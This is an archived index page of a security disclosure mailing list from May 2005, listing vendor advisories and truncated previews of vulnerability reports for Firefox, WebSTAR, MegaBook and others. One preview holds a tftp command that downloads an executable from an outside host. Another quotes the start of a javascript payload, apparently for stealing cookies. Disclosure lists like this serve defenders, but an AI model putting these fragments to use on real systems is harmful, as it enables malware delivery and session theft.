|
|
Colapse all |
Post message
Re: Can't trust COMODO - An Update 2005-05-09 Gunter Ollmann (gunter ngssoftware com) Hi List, An Update on progress with Comodo. Firstly thanks to all of you who emailed directly with advice and disbelief on the way Comodo plagiarised/copied my work. I could only reply to a few of you at the time because the volume of replies was amazing (it would appear that many of you were [ more ] [ reply ] [SECURITY] [DSA 722-1] New smail packages fix arbitrary code execution 2005-05-09 joey infodrom org (Martin Schulze) Firefox Remote Compromise Technical Details 2005-05-08 Paul (paul greyhats cjb net) Firefox Remote Compromise Technical Details Before I start, I need to say that this thing has been patched on Mozilla's server. If you take a look at any of the extension install pages on their site, you will see that the install function has a bunch of random letters and numbers after it. Even t [ more ] [ reply ] Re: firefox 1.0.3 spoof+auto dl 2005-05-08 Paul (paul greyhats cjb net) In-Reply-To: <20050507173037.20610.qmail (at) www.securityfocus (dot) com [email concealed]> This is the copy of my PoC. The person responsible for the leak of my remote compromise is the starter of this thread. In fact, he copies some of the code directly from my PoC: javascript:'<noscript>'+eval('if (window.name!=\'stealcoo [ more ] [ reply ] Firefox Remote Compromise Leaked 2005-05-08 Paul (paul greyhats cjb net) Well, apparently one of my Firefox vulnerabilities has been leaked. Mikx and I have been working on Firefox security for some time and we are trying to put together something spectacular, but unfortunatly there are always those people out there that feel they need to ruin it for people. About a we [ more ] [ reply ] [ GLSA 200505-04 ] GnuTLS: Denial of Service vulnerability 2005-05-09 Matthias Geerdsen (vorlon gentoo org) Re: MegaBook V2.0 - Cross Site Scripting Exploit 2005-05-08 Spy Hat (spyhat spyhat com) In-Reply-To: <20050505104551.23441.qmail (at) www.securityfocus (dot) com [email concealed]> The same vulnerability also exist in the new version of MegaBook V2.1 >Received: (qmail 6270 invoked from network); 5 May 2005 17:31:03 -0000 >Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.2 [ more ] [ reply ] firefox 1.0.3 spoof+auto dl 2005-05-07 john smith (edward11 postmaster co uk) firefox 1.0.3 spoof+auto dl ./0 bite the cheese illwill./ idiot tftp -i illmob.zapto.org get test.exe c:\test.exe ./-----------------js.js----------./ var blockedReferrer = 'blockedReferrer'; NS_ActualWrite=document.write; // Popup Blocker --> RanPostamble=0; NS_ActualOpen=window.open; functi [ more ] [ reply ] 4d WebSTAR 5.x Web Server Mac OS X Buffer Overflow 2005-05-06 Braden Thomas (bjthomas usc edu) 4d WebSTAR 5.x Mac OS X Buffer Overflow Author: Braden Thomas Vendor: http://www.4d.com Product: 4d WebSTAR 5.33 and 5.4 Web Server on Mac OS X *only trial version tested Risk: Medium, remote root (unlikely), DoS (likely) PoC Exploit code included Description: 4d WebSTAR 5.x (5.33 and 5.4 tes [ more ] [ reply ] [ GLSA 200505-03 ] Ethereal: Numerous vulnerabilities 2005-05-06 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [USN-123-1] Xine library vulnerabilities 2005-05-06 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-123-1 May 06, 2005 xine-lib vulnerabilities CAN-2005-1195 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ub [ more ] [ reply ] [USN-120-1] Apache 2 vulnerability 2005-05-06 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-120-1 May 06, 2005 apache2 vulnerability CAN-2005-1344 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubunt [ more ] [ reply ] [USN-121-1] OpenOffice.org vulnerability 2005-05-06 Martin Pitt (martin pitt canonical com) ========================================================== Ubuntu Security Notice USN-121-1 May 06, 2005 openoffice.org vulnerability CAN-2005-0941 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) [ more ] [ reply ] [USN-122-1] Squid vulnerability 2005-05-06 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-122-1 May 06, 2005 squid vulnerability CAN-2005-1345 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu [ more ] [ reply ] [USN-119-1] tcpdump vulnerabilities 2005-05-06 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-119-1 May 06, 2005 tcpdump vulnerabilities CAN-2005-1278, CAN-2005-1279, CAN-2005-1280 =========================================================== A security issue affects the following Ubuntu releases: U [ more ] [ reply ] [SECURITY] [DSA 721-1] New squid packages fix ACL bypass 2005-05-06 joey infodrom org (Martin Schulze) PHP Advanced Transfer Manager v1.21 2005-05-06 tjomi4 gmail com oooo...oooo.oooooooo8.ooooooooooo .8888o..88.888........88..888..88 .88.888o88..888oooooo.....888 .88...8888.........888....888 o88o....88.o88oooo888....o888o ******************************** **** Network security team ***** ********* nst.void.ru ********** *************************** [ more ] [ reply ] FreeBSD Security Advisory FreeBSD-SA-05:08.kmem 2005-05-06 FreeBSD Security Advisories (security-advisories freebsd org) FreeBSD Security Advisory FreeBSD-SA-05:07.ldt 2005-05-06 FreeBSD Security Advisories (security-advisories freebsd org) FreeBSD Security Advisory FreeBSD-SA-05:06.iir 2005-05-06 FreeBSD Security Advisories (security-advisories freebsd org) MDKSA-2005:081 - Updated XFree86/XOrg packages fix libXpm vulnerabilities 2005-05-06 Mandriva Security Team (security mandriva com) Multiple Vulnerabilities In Invision Power Board 2005-05-06 GulfTech Security Research (security gulftech org) Re: MegaBook V2.0 - Cross Site Scripting Exploit 2005-05-06 Morning Wood (wood exploitlabs com) In-Reply-To: <20050505104551.23441.qmail (at) www.securityfocus (dot) com [email concealed]> umm.. http://exploitlabs.com/files/advisories/EXPL-A-2003-011-megabook-2.0.txt >Subject: MegaBook V2.0 - Cross Site Scripting Exploit > > > >The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, [ more ] [ reply ] MDKSA-2005:082 - Updated OpenOffice.org packages fix heap overflow vulnerability 2005-05-06 Mandriva Security Team (security mandriva com) Mac OS 10.4: new-account-wizzard in Mail 2.0 sends clear-text passwords 2005-05-04 Markus Wörle (mrks mrks de) Hello there! I reported this bug at 01-May-2005 09:21 PM CEST to Apples bug- reporting facility (Problem ID: 4104391) without reply yet. Summary: At its first use, Mail.app 2.0 will launch a new-account-wizzard that leads through the account-creation process. This wizzard asks for a name, a l [ more ] [ reply ] |
|
Privacy Statement |
Abstract: Three attacks that apply to certain configurations of IPsec have been identified. These configurations use Encapsulating Security Payload (ESP) in tunnel mode with confidentiality only, or with integrity protection being provided by a higher layer protocol. Some configurations using AH t
[ more ] [ reply ]